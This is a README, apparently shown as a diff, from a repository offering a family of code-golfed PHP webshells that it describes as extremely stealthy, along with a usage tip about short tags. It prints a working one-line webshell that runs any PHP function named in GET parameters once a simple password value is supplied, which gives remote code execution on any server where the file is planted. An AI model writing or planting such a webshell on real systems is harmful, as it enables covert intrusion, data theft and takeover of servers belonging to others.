s0md3v/nano/README.md

 Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.\
 Put it on watch maybe, I will continue to upload more webshells in here.

+**Note:** You may need to tweak some parts of the code if it doesn't work out for your.\
+For example, if short tags are disabled, you will need to replace <? with <?php.

 ### Nano
 ```php
 <?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);